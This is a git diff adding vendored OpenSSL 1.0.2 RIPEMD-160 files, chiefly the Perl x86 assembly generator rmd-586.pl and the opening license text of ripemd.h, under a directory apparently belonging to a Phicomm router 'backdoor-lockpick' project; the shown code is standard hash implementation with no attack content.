diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rmd-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rmd-586.pl
new file mode 100644
index 0000000..e8b2bc2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/asm/rmd-586.pl
@@ -0,0 +1,591 @@
+#!/usr/local/bin/perl
+
+# Normal is the
+# ripemd160_block_asm_data_order(RIPEMD160_CTX *c, ULONG *X,int blocks);
+
+$normal=0;
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+
+&asm_init($ARGV[0],$0);
+
+$A="ecx";
+$B="esi";
+$C="edi";
+$D="ebx";
+$E="ebp";
+$tmp1="eax";
+$tmp2="edx";
+
+$KL1=0x5A827999;
+$KL2=0x6ED9EBA1;
+$KL3=0x8F1BBCDC;
+$KL4=0xA953FD4E;
+$KR0=0x50A28BE6;
+$KR1=0x5C4DD124; 
+$KR2=0x6D703EF3;
+$KR3=0x7A6D76E9;
+
+
+@wl=(	 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15,
+	 7, 4,13, 1,10, 6,15, 3,12, 0, 9, 5, 2,14,11, 8,
+	 3,10,14, 4, 9,15, 8, 1, 2, 7, 0, 6,13,11, 5,12,
+	 1, 9,11,10, 0, 8,12, 4,13, 3, 7,15,14, 5, 6, 2,
+	 4, 0, 5, 9, 7,12, 2,10,14, 1, 3, 8,11, 6,15,13,
+	 );
+
+@wr=(	 5,14, 7, 0, 9, 2,11, 4,13, 6,15, 8, 1,10, 3,12,
+	 6,11, 3, 7, 0,13, 5,10,14,15, 8,12, 4, 9, 1, 2,
+	15, 5, 1, 3, 7,14, 6, 9,11, 8,12, 2,10, 0, 4,13,
+	 8, 6, 4, 1, 3,11,15, 0, 5,12, 2,13, 9, 7,10,14,
+	12,15,10, 4, 1, 5, 8, 7, 6, 2,13,14, 0, 3, 9,11,
+	);
+
+@sl=(	11,14,15,12, 5, 8, 7, 9,11,13,14,15, 6, 7, 9, 8,
+	 7, 6, 8,13,11, 9, 7,15, 7,12,15, 9,11, 7,13,12,
+	11,13, 6, 7,14, 9,13,15,14, 8,13, 6, 5,12, 7, 5,
+	11,12,14,15,14,15, 9, 8, 9,14, 5, 6, 8, 6, 5,12,
+	 9,15, 5,11, 6, 8,13,12, 5,12,13,14,11, 8, 5, 6,
+	 );
+
+@sr=(	 8, 9, 9,11,13,15,15, 5, 7, 7, 8,11,14,14,12, 6,
+	 9,13,15, 7,12, 8, 9,11, 7, 7,12, 7, 6,15,13,11,
+	 9, 7,15,11, 8, 6, 6,14,12,13, 5,14,13,13, 7, 5,
+	15, 5, 8,11,14,14, 6,14, 6, 9,12, 9,12, 5,15, 8,
+	 8, 5,12, 9,12, 5,14, 6, 8,13, 6, 5,15,13,11,11,
+ 	);
+
+&ripemd160_block("ripemd160_block_asm_data_order");
+&asm_finish();
+
+sub Xv
+	{
+	local($n)=@_;
+	return(&swtmp($n));
+	# tmp on stack
+	}
+
+sub Np
+	{
+	local($p)=@_;
+	local(%n)=($A,$E,$B,$A,$C,$B,$D,$C,$E,$D);
+	return($n{$p});
+	}
+
+sub RIP1
+	{
+	local($a,$b,$c,$d,$e,$pos,$s,$o,$pos2)=@_;
+
+	&comment($p++);
+	if ($p & 1)
+		{
+	 #&mov($tmp1,	$c) if $o == -1;
+	&xor($tmp1,	$d) if $o == -1;
+	 &mov($tmp2,	&Xv($pos));
+	&xor($tmp1,	$b);
+	 &add($a,	$tmp2);
+	&rotl($c,	10);
+	&add($a,	$tmp1);
+	 &mov($tmp1,	&Np($c));	# NEXT
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	else
+		{
+	 &xor($tmp1,	$d);
+	&mov($tmp2,	&Xv($pos));
+	 &xor($tmp1,	$b);
+	&add($a,	$tmp1);
+	 &mov($tmp1,	&Np($c)) if $o <= 0;
+	 &mov($tmp1,	-1) if $o == 1;
+	 # XXX if $o == 2;
+	&rotl($c,	10);
+	&add($a,	$tmp2);
+	 &xor($tmp1,	&Np($d)) if $o <= 0;
+	 &mov($tmp2,	&Xv($pos2)) if $o == 1;
+	 &mov($tmp2,	&wparam(0)) if $o == 2;
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	}
+
+sub RIP2
+	{
+	local($a,$b,$c,$d,$e,$pos,$pos2,$s,$K,$o)=@_;
+
+# XXXXXX
+	&comment($p++);
+	if ($p & 1)
+		{
+#	 &mov($tmp2,	&Xv($pos)) if $o < -1;
+#	&mov($tmp1,	-1) if $o < -1;
+
+	 &add($a,	$tmp2);
+	&mov($tmp2,	$c);
+	 &sub($tmp1,	$b);
+	&and($tmp2,	$b);
+	 &and($tmp1,	$d);
+	&or($tmp2,	$tmp1);
+	 &mov($tmp1,	&Xv($pos2)) if $o <= 0; # XXXXXXXXXXXXXX
+	 # XXX
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2,1));
+	 &mov($tmp2,	-1) if $o <= 0;
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	else
+		{
+	 # XXX
+	 &add($a,	$tmp1);
+	&mov($tmp1,	$c);
+	 &sub($tmp2,	$b);
+	&and($tmp1,	$b);
+	 &and($tmp2,	$d);
+	if ($o != 2)
+		{
+	&or($tmp1,	$tmp2);
+	 &mov($tmp2,	&Xv($pos2)) if $o <= 0;
+	 &mov($tmp2,	-1) if $o == 1;
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp1,1));
+	 &mov($tmp1,	-1) if $o <= 0;
+	 &sub($tmp2,	&Np($c)) if $o == 1;
+		} else {
+	&or($tmp2,	$tmp1);
+	 &mov($tmp1,	&Np($c));
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2,1));
+	 &xor($tmp1,	&Np($d));
+		}
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	}
+
+sub RIP3
+	{
+	local($a,$b,$c,$d,$e,$pos,$s,$K,$o,$pos2)=@_;
+
+	&comment($p++);
+	if ($p & 1)
+		{
+#	 &mov($tmp2,	-1) if $o < -1;
+#	&sub($tmp2,	$c) if $o < -1;
+	 &mov($tmp1,	&Xv($pos));
+	&or($tmp2,	$b);
+	 &add($a,	$tmp1);
+	&xor($tmp2,	$d);
+	 &mov($tmp1,	-1) if $o <= 0;		# NEXT
+	 # XXX
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2,1));
+	 &sub($tmp1,	&Np($c)) if $o <= 0;	# NEXT
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	else
+		{
+	 &mov($tmp2,	&Xv($pos));
+	&or($tmp1,	$b);
+	 &add($a,	$tmp2);
+	&xor($tmp1,	$d);
+	 &mov($tmp2,	-1) if $o <= 0;		# NEXT
+	 &mov($tmp2,	-1) if $o == 1;
+	 &mov($tmp2,	&Xv($pos2)) if $o == 2;
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp1,1));
+	 &sub($tmp2,	&Np($c)) if $o <= 0;	# NEXT
+	 &mov($tmp1,	&Np($d)) if $o == 1;
+	 &mov($tmp1,	-1) if $o == 2;
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	}
+
+sub RIP4
+	{
+	local($a,$b,$c,$d,$e,$pos,$s,$K,$o)=@_;
+
+	&comment($p++);
+	if ($p & 1)
+		{
+#	 &mov($tmp2,	-1) if $o == -2;
+#	&mov($tmp1,	$d) if $o == -2;
+	 &sub($tmp2,	$d);
+	&and($tmp1,	$b);
+	 &and($tmp2,	$c);
+	&or($tmp2,	$tmp1);
+	 &mov($tmp1,	&Xv($pos));
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2));
+	 &mov($tmp2,	-1) unless $o > 0;	# NEXT
+	 # XXX
+	&add($a,	$tmp1);
+	 &mov($tmp1,	&Np($d)) unless $o > 0; # NEXT
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	else
+		{
+	 &sub($tmp2,	$d);
+	&and($tmp1,	$b);
+	 &and($tmp2,	$c);
+	&or($tmp2,	$tmp1);
+	 &mov($tmp1,	&Xv($pos));
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2));
+	 &mov($tmp2,	-1) if $o == 0;	# NEXT
+	 &mov($tmp2,	-1) if $o == 1;
+	 &mov($tmp2,	-1) if $o == 2;
+	 # XXX
+	&add($a,	$tmp1);
+	 &mov($tmp1,	&Np($d)) if $o == 0;	# NEXT
+	 &sub($tmp2,	&Np($d)) if $o == 1;
+	 &sub($tmp2,	&Np($c)) if $o == 2;
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	}
+
+sub RIP5
+	{
+	local($a,$b,$c,$d,$e,$pos,$s,$K,$o)=@_;
+
+	&comment($p++);
+	if ($p & 1)
+		{
+	 &mov($tmp2,	-1) if $o == -2;
+	&sub($tmp2,	$d) if $o == -2;
+	 &mov($tmp1,	&Xv($pos));
+	&or($tmp2,	$c);
+	 &add($a,	$tmp1);
+	&xor($tmp2,	$b);
+	 &mov($tmp1,	-1) if $o <= 0;
+	 # XXX
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp2,1));
+	 &sub($tmp1,	&Np($d)) if $o <= 0;
+	 # XXX
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	else
+		{
+	 &mov($tmp2,	&Xv($pos));
+	&or($tmp1,	$c);
+	 &add($a,	$tmp2);
+	&xor($tmp1,	$b);
+	 &mov($tmp2,	-1) if $o <= 0;
+	 &mov($tmp2,	&wparam(0)) if $o == 1;	# Middle code
+	 &mov($tmp2,	-1) if $o == 2;
+	&rotl($c,	10);
+	&lea($a,	&DWP($K,$a,$tmp1,1));
+	 &sub($tmp2,	&Np($d)) if $o <= 0;
+	 &mov(&swtmp(16),	$A) if $o == 1;
+	 &mov($tmp1,	&Np($d)) if $o == 2;
+	&rotl($a,	$s);
+	&add($a,	$e);
+		}
+	}
+
+sub ripemd160_block
+	{
+	local($name)=@_;
+
+	&function_begin_B($name,"",3);
+
+	# parameter 1 is the RIPEMD160_CTX structure.
+	# A	0
+	# B	4
+	# C	8
+	# D 	12
+	# E 	16
+
+	&mov($tmp2,	&wparam(0));
+	 &mov($tmp1,	&wparam(1));
+	&push("esi");
+	 &mov($A,	&DWP( 0,$tmp2,"",0));
+	&push("edi");
+	 &mov($B,	&DWP( 4,$tmp2,"",0));
+	&push("ebp");
+	 &mov($C,	&DWP( 8,$tmp2,"",0));
+	&push("ebx");
+	 &stack_push(16+5+6);
+			  # Special comment about the figure of 6.
+			  # Idea is to pad the current frame so
+			  # that the top of the stack gets fairly
+			  # aligned. Well, as you realize it would
+			  # always depend on how the frame below is
+			  # aligned. The good news are that gcc-2.95
+			  # and later does keep first argument at
+			  # least double-wise aligned.
+			  #			<appro@fy.chalmers.se>
+
+	&set_label("start") unless $normal;
+	&comment("");
+
+	# &mov($tmp1,	&wparam(1)); # Done at end of loop
+	# &mov($tmp2,	&wparam(0)); # Done at end of loop
+
+	for ($z=0; $z<16; $z+=2)
+		{
+		&mov($D,		&DWP( $z*4,$tmp1,"",0));
+		 &mov($E,		&DWP( ($z+1)*4,$tmp1,"",0));
+		&mov(&swtmp($z),	$D);
+		 &mov(&swtmp($z+1),	$E);
+		}
+	&mov($tmp1,	$C);
+	 &mov($D,	&DWP(12,$tmp2,"",0));
+	&mov($E,	&DWP(16,$tmp2,"",0));
+
+	&RIP1($A,$B,$C,$D,$E,$wl[ 0],$sl[ 0],-1);
+	&RIP1($E,$A,$B,$C,$D,$wl[ 1],$sl[ 1],0);
+	&RIP1($D,$E,$A,$B,$C,$wl[ 2],$sl[ 2],0);
+	&RIP1($C,$D,$E,$A,$B,$wl[ 3],$sl[ 3],0);
+	&RIP1($B,$C,$D,$E,$A,$wl[ 4],$sl[ 4],0);
+	&RIP1($A,$B,$C,$D,$E,$wl[ 5],$sl[ 5],0);
+	&RIP1($E,$A,$B,$C,$D,$wl[ 6],$sl[ 6],0);
+	&RIP1($D,$E,$A,$B,$C,$wl[ 7],$sl[ 7],0);
+	&RIP1($C,$D,$E,$A,$B,$wl[ 8],$sl[ 8],0);
+	&RIP1($B,$C,$D,$E,$A,$wl[ 9],$sl[ 9],0);
+	&RIP1($A,$B,$C,$D,$E,$wl[10],$sl[10],0);
+	&RIP1($E,$A,$B,$C,$D,$wl[11],$sl[11],0);
+	&RIP1($D,$E,$A,$B,$C,$wl[12],$sl[12],0);
+	&RIP1($C,$D,$E,$A,$B,$wl[13],$sl[13],0);
+	&RIP1($B,$C,$D,$E,$A,$wl[14],$sl[14],0);
+	&RIP1($A,$B,$C,$D,$E,$wl[15],$sl[15],1,$wl[16]);
+
+	&RIP2($E,$A,$B,$C,$D,$wl[16],$wl[17],$sl[16],$KL1,-1);
+	&RIP2($D,$E,$A,$B,$C,$wl[17],$wl[18],$sl[17],$KL1,0);
+	&RIP2($C,$D,$E,$A,$B,$wl[18],$wl[19],$sl[18],$KL1,0);
+	&RIP2($B,$C,$D,$E,$A,$wl[19],$wl[20],$sl[19],$KL1,0);
+	&RIP2($A,$B,$C,$D,$E,$wl[20],$wl[21],$sl[20],$KL1,0);
+	&RIP2($E,$A,$B,$C,$D,$wl[21],$wl[22],$sl[21],$KL1,0);
+	&RIP2($D,$E,$A,$B,$C,$wl[22],$wl[23],$sl[22],$KL1,0);
+	&RIP2($C,$D,$E,$A,$B,$wl[23],$wl[24],$sl[23],$KL1,0);
+	&RIP2($B,$C,$D,$E,$A,$wl[24],$wl[25],$sl[24],$KL1,0);
+	&RIP2($A,$B,$C,$D,$E,$wl[25],$wl[26],$sl[25],$KL1,0);
+	&RIP2($E,$A,$B,$C,$D,$wl[26],$wl[27],$sl[26],$KL1,0);
+	&RIP2($D,$E,$A,$B,$C,$wl[27],$wl[28],$sl[27],$KL1,0);
+	&RIP2($C,$D,$E,$A,$B,$wl[28],$wl[29],$sl[28],$KL1,0);
+	&RIP2($B,$C,$D,$E,$A,$wl[29],$wl[30],$sl[29],$KL1,0);
+	&RIP2($A,$B,$C,$D,$E,$wl[30],$wl[31],$sl[30],$KL1,0);
+	&RIP2($E,$A,$B,$C,$D,$wl[31],$wl[32],$sl[31],$KL1,1);
+
+	&RIP3($D,$E,$A,$B,$C,$wl[32],$sl[32],$KL2,-1);
+	&RIP3($C,$D,$E,$A,$B,$wl[33],$sl[33],$KL2,0);
+	&RIP3($B,$C,$D,$E,$A,$wl[34],$sl[34],$KL2,0);
+	&RIP3($A,$B,$C,$D,$E,$wl[35],$sl[35],$KL2,0);
+	&RIP3($E,$A,$B,$C,$D,$wl[36],$sl[36],$KL2,0);
+	&RIP3($D,$E,$A,$B,$C,$wl[37],$sl[37],$KL2,0);
+	&RIP3($C,$D,$E,$A,$B,$wl[38],$sl[38],$KL2,0);
+	&RIP3($B,$C,$D,$E,$A,$wl[39],$sl[39],$KL2,0);
+	&RIP3($A,$B,$C,$D,$E,$wl[40],$sl[40],$KL2,0);
+	&RIP3($E,$A,$B,$C,$D,$wl[41],$sl[41],$KL2,0);
+	&RIP3($D,$E,$A,$B,$C,$wl[42],$sl[42],$KL2,0);
+	&RIP3($C,$D,$E,$A,$B,$wl[43],$sl[43],$KL2,0);
+	&RIP3($B,$C,$D,$E,$A,$wl[44],$sl[44],$KL2,0);
+	&RIP3($A,$B,$C,$D,$E,$wl[45],$sl[45],$KL2,0);
+	&RIP3($E,$A,$B,$C,$D,$wl[46],$sl[46],$KL2,0);
+	&RIP3($D,$E,$A,$B,$C,$wl[47],$sl[47],$KL2,1);
+
+	&RIP4($C,$D,$E,$A,$B,$wl[48],$sl[48],$KL3,-1);
+	&RIP4($B,$C,$D,$E,$A,$wl[49],$sl[49],$KL3,0);
+	&RIP4($A,$B,$C,$D,$E,$wl[50],$sl[50],$KL3,0);
+	&RIP4($E,$A,$B,$C,$D,$wl[51],$sl[51],$KL3,0);
+	&RIP4($D,$E,$A,$B,$C,$wl[52],$sl[52],$KL3,0);
+	&RIP4($C,$D,$E,$A,$B,$wl[53],$sl[53],$KL3,0);
+	&RIP4($B,$C,$D,$E,$A,$wl[54],$sl[54],$KL3,0);
+	&RIP4($A,$B,$C,$D,$E,$wl[55],$sl[55],$KL3,0);
+	&RIP4($E,$A,$B,$C,$D,$wl[56],$sl[56],$KL3,0);
+	&RIP4($D,$E,$A,$B,$C,$wl[57],$sl[57],$KL3,0);
+	&RIP4($C,$D,$E,$A,$B,$wl[58],$sl[58],$KL3,0);
+	&RIP4($B,$C,$D,$E,$A,$wl[59],$sl[59],$KL3,0);
+	&RIP4($A,$B,$C,$D,$E,$wl[60],$sl[60],$KL3,0);
+	&RIP4($E,$A,$B,$C,$D,$wl[61],$sl[61],$KL3,0);
+	&RIP4($D,$E,$A,$B,$C,$wl[62],$sl[62],$KL3,0);
+	&RIP4($C,$D,$E,$A,$B,$wl[63],$sl[63],$KL3,1);
+
+	&RIP5($B,$C,$D,$E,$A,$wl[64],$sl[64],$KL4,-1);
+	&RIP5($A,$B,$C,$D,$E,$wl[65],$sl[65],$KL4,0);
+	&RIP5($E,$A,$B,$C,$D,$wl[66],$sl[66],$KL4,0);
+	&RIP5($D,$E,$A,$B,$C,$wl[67],$sl[67],$KL4,0);
+	&RIP5($C,$D,$E,$A,$B,$wl[68],$sl[68],$KL4,0);
+	&RIP5($B,$C,$D,$E,$A,$wl[69],$sl[69],$KL4,0);
+	&RIP5($A,$B,$C,$D,$E,$wl[70],$sl[70],$KL4,0);
+	&RIP5($E,$A,$B,$C,$D,$wl[71],$sl[71],$KL4,0);
+	&RIP5($D,$E,$A,$B,$C,$wl[72],$sl[72],$KL4,0);
+	&RIP5($C,$D,$E,$A,$B,$wl[73],$sl[73],$KL4,0);
+	&RIP5($B,$C,$D,$E,$A,$wl[74],$sl[74],$KL4,0);
+	&RIP5($A,$B,$C,$D,$E,$wl[75],$sl[75],$KL4,0);
+	&RIP5($E,$A,$B,$C,$D,$wl[76],$sl[76],$KL4,0);
+	&RIP5($D,$E,$A,$B,$C,$wl[77],$sl[77],$KL4,0);
+	&RIP5($C,$D,$E,$A,$B,$wl[78],$sl[78],$KL4,0);
+	&RIP5($B,$C,$D,$E,$A,$wl[79],$sl[79],$KL4,1);
+
+	# &mov($tmp2,	&wparam(0)); # moved into last RIP5
+	# &mov(&swtmp(16),	$A);
+	 &mov($A,	&DWP( 0,$tmp2,"",0));
+	&mov(&swtmp(16+1),	$B);
+	 &mov(&swtmp(16+2),	$C);
+	&mov($B,	&DWP( 4,$tmp2,"",0));
+	 &mov(&swtmp(16+3),	$D);
+	&mov($C,	&DWP( 8,$tmp2,"",0));
+	 &mov(&swtmp(16+4),	$E);
+	&mov($D,	&DWP(12,$tmp2,"",0));
+	 &mov($E,	&DWP(16,$tmp2,"",0));
+
+	&RIP5($A,$B,$C,$D,$E,$wr[ 0],$sr[ 0],$KR0,-2);
+	&RIP5($E,$A,$B,$C,$D,$wr[ 1],$sr[ 1],$KR0,0);
+	&RIP5($D,$E,$A,$B,$C,$wr[ 2],$sr[ 2],$KR0,0);
+	&RIP5($C,$D,$E,$A,$B,$wr[ 3],$sr[ 3],$KR0,0);
+	&RIP5($B,$C,$D,$E,$A,$wr[ 4],$sr[ 4],$KR0,0);
+	&RIP5($A,$B,$C,$D,$E,$wr[ 5],$sr[ 5],$KR0,0);
+	&RIP5($E,$A,$B,$C,$D,$wr[ 6],$sr[ 6],$KR0,0);
+	&RIP5($D,$E,$A,$B,$C,$wr[ 7],$sr[ 7],$KR0,0);
+	&RIP5($C,$D,$E,$A,$B,$wr[ 8],$sr[ 8],$KR0,0);
+	&RIP5($B,$C,$D,$E,$A,$wr[ 9],$sr[ 9],$KR0,0);
+	&RIP5($A,$B,$C,$D,$E,$wr[10],$sr[10],$KR0,0);
+	&RIP5($E,$A,$B,$C,$D,$wr[11],$sr[11],$KR0,0);
+	&RIP5($D,$E,$A,$B,$C,$wr[12],$sr[12],$KR0,0);
+	&RIP5($C,$D,$E,$A,$B,$wr[13],$sr[13],$KR0,0);
+	&RIP5($B,$C,$D,$E,$A,$wr[14],$sr[14],$KR0,0);
+	&RIP5($A,$B,$C,$D,$E,$wr[15],$sr[15],$KR0,2);
+
+	&RIP4($E,$A,$B,$C,$D,$wr[16],$sr[16],$KR1,-2);
+	&RIP4($D,$E,$A,$B,$C,$wr[17],$sr[17],$KR1,0);
+	&RIP4($C,$D,$E,$A,$B,$wr[18],$sr[18],$KR1,0);
+	&RIP4($B,$C,$D,$E,$A,$wr[19],$sr[19],$KR1,0);
+	&RIP4($A,$B,$C,$D,$E,$wr[20],$sr[20],$KR1,0);
+	&RIP4($E,$A,$B,$C,$D,$wr[21],$sr[21],$KR1,0);
+	&RIP4($D,$E,$A,$B,$C,$wr[22],$sr[22],$KR1,0);
+	&RIP4($C,$D,$E,$A,$B,$wr[23],$sr[23],$KR1,0);
+	&RIP4($B,$C,$D,$E,$A,$wr[24],$sr[24],$KR1,0);
+	&RIP4($A,$B,$C,$D,$E,$wr[25],$sr[25],$KR1,0);
+	&RIP4($E,$A,$B,$C,$D,$wr[26],$sr[26],$KR1,0);
+	&RIP4($D,$E,$A,$B,$C,$wr[27],$sr[27],$KR1,0);
+	&RIP4($C,$D,$E,$A,$B,$wr[28],$sr[28],$KR1,0);
+	&RIP4($B,$C,$D,$E,$A,$wr[29],$sr[29],$KR1,0);
+	&RIP4($A,$B,$C,$D,$E,$wr[30],$sr[30],$KR1,0);
+	&RIP4($E,$A,$B,$C,$D,$wr[31],$sr[31],$KR1,2);
+
+	&RIP3($D,$E,$A,$B,$C,$wr[32],$sr[32],$KR2,-2);
+	&RIP3($C,$D,$E,$A,$B,$wr[33],$sr[33],$KR2,0);
+	&RIP3($B,$C,$D,$E,$A,$wr[34],$sr[34],$KR2,0);
+	&RIP3($A,$B,$C,$D,$E,$wr[35],$sr[35],$KR2,0);
+	&RIP3($E,$A,$B,$C,$D,$wr[36],$sr[36],$KR2,0);
+	&RIP3($D,$E,$A,$B,$C,$wr[37],$sr[37],$KR2,0);
+	&RIP3($C,$D,$E,$A,$B,$wr[38],$sr[38],$KR2,0);
+	&RIP3($B,$C,$D,$E,$A,$wr[39],$sr[39],$KR2,0);
+	&RIP3($A,$B,$C,$D,$E,$wr[40],$sr[40],$KR2,0);
+	&RIP3($E,$A,$B,$C,$D,$wr[41],$sr[41],$KR2,0);
+	&RIP3($D,$E,$A,$B,$C,$wr[42],$sr[42],$KR2,0);
+	&RIP3($C,$D,$E,$A,$B,$wr[43],$sr[43],$KR2,0);
+	&RIP3($B,$C,$D,$E,$A,$wr[44],$sr[44],$KR2,0);
+	&RIP3($A,$B,$C,$D,$E,$wr[45],$sr[45],$KR2,0);
+	&RIP3($E,$A,$B,$C,$D,$wr[46],$sr[46],$KR2,0);
+	&RIP3($D,$E,$A,$B,$C,$wr[47],$sr[47],$KR2,2,$wr[48]);
+
+	&RIP2($C,$D,$E,$A,$B,$wr[48],$wr[49],$sr[48],$KR3,-2);
+	&RIP2($B,$C,$D,$E,$A,$wr[49],$wr[50],$sr[49],$KR3,0);
+	&RIP2($A,$B,$C,$D,$E,$wr[50],$wr[51],$sr[50],$KR3,0);
+	&RIP2($E,$A,$B,$C,$D,$wr[51],$wr[52],$sr[51],$KR3,0);
+	&RIP2($D,$E,$A,$B,$C,$wr[52],$wr[53],$sr[52],$KR3,0);
+	&RIP2($C,$D,$E,$A,$B,$wr[53],$wr[54],$sr[53],$KR3,0);
+	&RIP2($B,$C,$D,$E,$A,$wr[54],$wr[55],$sr[54],$KR3,0);
+	&RIP2($A,$B,$C,$D,$E,$wr[55],$wr[56],$sr[55],$KR3,0);
+	&RIP2($E,$A,$B,$C,$D,$wr[56],$wr[57],$sr[56],$KR3,0);
+	&RIP2($D,$E,$A,$B,$C,$wr[57],$wr[58],$sr[57],$KR3,0);
+	&RIP2($C,$D,$E,$A,$B,$wr[58],$wr[59],$sr[58],$KR3,0);
+	&RIP2($B,$C,$D,$E,$A,$wr[59],$wr[60],$sr[59],$KR3,0);
+	&RIP2($A,$B,$C,$D,$E,$wr[60],$wr[61],$sr[60],$KR3,0);
+	&RIP2($E,$A,$B,$C,$D,$wr[61],$wr[62],$sr[61],$KR3,0);
+	&RIP2($D,$E,$A,$B,$C,$wr[62],$wr[63],$sr[62],$KR3,0);
+	&RIP2($C,$D,$E,$A,$B,$wr[63],$wr[64],$sr[63],$KR3,2);
+
+	&RIP1($B,$C,$D,$E,$A,$wr[64],$sr[64],-2);
+	&RIP1($A,$B,$C,$D,$E,$wr[65],$sr[65],0);
+	&RIP1($E,$A,$B,$C,$D,$wr[66],$sr[66],0);
+	&RIP1($D,$E,$A,$B,$C,$wr[67],$sr[67],0);
+	&RIP1($C,$D,$E,$A,$B,$wr[68],$sr[68],0);
+	&RIP1($B,$C,$D,$E,$A,$wr[69],$sr[69],0);
+	&RIP1($A,$B,$C,$D,$E,$wr[70],$sr[70],0);
+	&RIP1($E,$A,$B,$C,$D,$wr[71],$sr[71],0);
+	&RIP1($D,$E,$A,$B,$C,$wr[72],$sr[72],0);
+	&RIP1($C,$D,$E,$A,$B,$wr[73],$sr[73],0);
+	&RIP1($B,$C,$D,$E,$A,$wr[74],$sr[74],0);
+	&RIP1($A,$B,$C,$D,$E,$wr[75],$sr[75],0);
+	&RIP1($E,$A,$B,$C,$D,$wr[76],$sr[76],0);
+	&RIP1($D,$E,$A,$B,$C,$wr[77],$sr[77],0);
+	&RIP1($C,$D,$E,$A,$B,$wr[78],$sr[78],0);
+	&RIP1($B,$C,$D,$E,$A,$wr[79],$sr[79],2);
+
+	# &mov($tmp2,	&wparam(0)); # Moved into last round
+
+	 &mov($tmp1,	&DWP( 4,$tmp2,"",0));	# ctx->B
+ 	&add($D,	$tmp1);	
+	 &mov($tmp1,	&swtmp(16+2));		# $c
+	&add($D,	$tmp1);
+
+	 &mov($tmp1,	&DWP( 8,$tmp2,"",0));	# ctx->C
+	&add($E,	$tmp1);	
+	 &mov($tmp1,	&swtmp(16+3));		# $d
+	&add($E,	$tmp1);
+
+	 &mov($tmp1,	&DWP(12,$tmp2,"",0));	# ctx->D
+	&add($A,	$tmp1);	
+	 &mov($tmp1,	&swtmp(16+4));		# $e
+	&add($A,	$tmp1);
+
+
+	 &mov($tmp1,	&DWP(16,$tmp2,"",0));	# ctx->E
+	&add($B,	$tmp1);	
+	 &mov($tmp1,	&swtmp(16+0));		# $a
+	&add($B,	$tmp1);
+
+	 &mov($tmp1,	&DWP( 0,$tmp2,"",0));	# ctx->A
+	&add($C,	$tmp1);	
+	 &mov($tmp1,	&swtmp(16+1));		# $b
+	&add($C,	$tmp1);
+
+	 &mov($tmp1,	&wparam(2));
+
+	&mov(&DWP( 0,$tmp2,"",0),	$D);
+	 &mov(&DWP( 4,$tmp2,"",0),	$E);
+	&mov(&DWP( 8,$tmp2,"",0),	$A);
+	 &sub($tmp1,1);
+	&mov(&DWP(12,$tmp2,"",0),	$B);
+	 &mov(&DWP(16,$tmp2,"",0),	$C);
+
+	&jle(&label("get_out"));
+
+	&mov(&wparam(2),$tmp1);
+	 &mov($C,	$A);
+	&mov($tmp1,	&wparam(1));
+	 &mov($A,	$D);
+	&add($tmp1,	64);
+	 &mov($B,	$E);
+	&mov(&wparam(1),$tmp1);
+
+	&jmp(&label("start"));
+
+	&set_label("get_out");
+
+	&stack_pop(16+5+6);
+
+	&pop("ebx");
+	&pop("ebp");
+	&pop("edi");
+	&pop("esi");
+	&ret();
+	&function_end_B($name);
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/ripemd.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/ripemd.h
new file mode 100644
index 0000000..b88ef25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ripemd/ripemd.h
@@ -0,0 +1,105 @@
+/* crypto/ripemd/ripemd.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
